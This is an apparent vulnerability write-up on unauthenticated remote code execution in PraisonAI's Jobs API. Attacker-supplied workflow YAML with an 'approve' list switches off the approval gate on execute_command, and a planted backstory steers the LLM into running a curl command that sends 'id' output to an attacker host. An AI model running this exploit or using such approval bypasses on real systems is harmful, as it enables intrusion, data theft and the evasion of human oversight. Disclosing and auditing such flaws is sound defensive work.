# PraisonAI: Unauthenticated RCE via Jobs API + Approval Bypass

Unauthenticated POST to PraisonAI Jobs API with YAML `approve: [execute_command]` bypasses approval decorator, letting an attacker run arbitrary OS commands.

**Target:** PraisonAI Jobs API endpoint /api/v1/runs and workflow YAML parser
**Root cause:** The submit_job route omits Depends(verify_token), and the YAML parser loads an attacker-controlled `approve` list into a ContextVar that the @require_approval decorator trusts before any risk-level check.
**Steps:**
1. POST to `http://<TARGET>:8005/api/v1/runs` with JSON body containing `prompt` and `agent_yaml`
2. In agent_yaml set `approve:\n - execute_command` and a step whose backstory instructs the LLM to call `execute_command` with `curl http://<ATTACKER>/pwn?output=$(id)`
3. yaml_parser.py:261 reads `approve` list and workflows.py:1025 calls `set_yaml_approved_tools(["execute_command"])`
4. LLM follows backstory and invokes execute_command; approval/__init__.py:179 `is_yaml_approved` returns True and skips the prompt
5. shell_tools.py:33 runs subprocess.Popen, executing the attacker command
**How found:** Code review comparing the unauthenticated submit_job route against the authenticated agent_invoke.py endpoint, then tracing the YAML `approve` field through yaml_parser into the approval decorator to find the bypass evaluated before risk checks.
**Exploitation:** Unauthenticated attacker submits a crafted workflow YAML to the Jobs API; the approve list disables the approval gate on execute_command, and the LLM's backstory instruction drives the tool to run an attacker-supplied shell command (e.g. curl exfil with $(id)), yielding RCE with no credentials or operator interaction.
**Insight:** When a framework exposes an LLM-driven tool executor, audit any YAML/JSON field that feeds a ContextVar consulted by safety decorators — approval state set from user input is a bypass primitive, and compare sibling routes for missing auth dependencies.
